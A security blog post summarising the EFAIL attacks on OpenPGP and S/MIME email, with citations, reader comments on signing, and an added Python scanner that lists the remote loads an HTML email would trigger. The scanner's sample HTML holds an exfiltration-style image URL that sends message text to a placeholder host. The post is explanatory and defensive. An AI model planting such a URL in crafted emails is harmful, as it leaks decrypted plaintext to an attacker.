Attention PGP Users: Critical PGP and S/MIME bugs

EFAIL describes vulnerabilities in the end-to-end encryption technologies OpenPGP and S/MIME that leak the plaintext of encrypted emails. (UPDATE – This attack targets buggy email clients.)

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
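As an added illustration (not code from the EFAIL paper or from this page), the sketch below lists every reference in an HTML body that a mail client would request on its own while rendering. These are the requests the exfiltration channel described above depends on, and the ones a "block remote content" setting has to stop. The sample body, its hostnames and the names `RemoteLoadFinder` and `remote_loads` are constructed for the example.

```python
import re
from html.parser import HTMLParser

# Attributes a renderer fetches automatically, with no click from the reader.
AUTO_FETCH_ATTRS = {"src", "background", "poster", "data"}
REMOTE = re.compile(r"\s*(?:(?:https?|ftp):|//)", re.I)
CSS_REF = re.compile(r"""(?:url\(\s*['"]?|@import\s+['"])([^'")\s;]+)""", re.I)
# Constructed sample body; the hostnames are placeholders.
SAMPLE_HTML = """<head><link rel="stylesheet" href="https://a.example.invalid/s.css">
<style>body { background: url('//b.example.invalid/bg.png') }</style></head>
<body><img src="http://c.example.invalid/p?q=text-from-the-message">
<img src="cid:logo@local"> <a href="https://example.invalid/">needs a click</a>
<div style="background-image:url(data:image/png;base64,AAAA)"></div></body>"""


class RemoteLoadFinder(HTMLParser):
    """Collects (tag, source, url) for each load that would leave the machine."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hits, self._in_style = [], False

    def _add(self, tag, source, urls):
        self.hits += [(tag, source, u.strip()) for u in urls if REMOTE.match(u)]

    def handle_starttag(self, tag, attrs):
        self._in_style = tag == "style"
        for name, value in attrs:
            value = value or ""  # valueless attributes arrive as None
            if name in AUTO_FETCH_ATTRS or (tag == "link" and name == "href"):
                self._add(tag, name, [value])
            elif name == "srcset":  # "url 1x, url 2x": the URL is the first token
                firsts = [c.split()[0] for c in value.split(",") if c.strip()]
                self._add(tag, name, firsts)
            elif name == "style":
                self._add(tag, "css", CSS_REF.findall(value))

    def handle_endtag(self, tag):
        self._in_style = False

    def handle_data(self, data):  # <style> content arrives here as raw text
        if self._in_style:
            self._add("style", "css", CSS_REF.findall(data))


def remote_loads(html):
    finder = RemoteLoadFinder()
    finder.feed(html)
    finder.close()
    return finder.hits
```

An empty result from `remote_loads` means nothing in the body triggers a request by itself; `cid:` attachments, `data:` URIs and ordinary links that need a click are deliberately not reported.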

Technical summary

Susceptibility of OpenPGP, GnuPG, and Gpg4Win

Full technical paper

Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels [v0.9 Draft][PDF]
Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, and Jörg Schwenk.
27th USENIX Security Symposium, Baltimore, August 2018.

The team can be contacted at


Electronic Frontier Foundation
MAY 13, 2018
Attention PGP Users: New Vulnerabilities Require You To Take Action Now

Ars Technica
MAY 14, 2018
Critical PGP and S/MIME bugs can reveal encrypted e-mails. Uninstall now

  • Andrew Vineyard says:

    Reading the article, the flaw isn’t in the encryption method itself, but in the email client. Even the article states that it can be fixed by patches to clients like Thunderbird, as it abuses a feature built into the email program’s rendering of live content.

    However, another way to prevent this exploit is not only encrypting the text, but also signing the entire email. If the signature from the email doesn’t match the sender’s email address, then it may very well be a maliciously crafted email from a third party that is sending spoofed messages. If you have the user’s PGP or S/MIME public keys, then you know something is off and you can contact them for an update, and if the email account was spoofed, then the real user will still get the request from you and not sent to the malicious user.

    I always recommend using the signature feature for these programs to prove who I am, because I regularly get emails that appear to be from people I know, however it quickly becomes obvious it’s not. Even got one appearing to be from someone I was speaking to on the phone once, and they never sent the email. Signing your emails using S/MIME or PGP can also mitigate an attack from a spoofed email, potentially even EFAIL, because changing the email to decrypt the ciphertext breaks the signature.

    • Nathan House says:

      These are good points. I have included the link to the official response for balance.
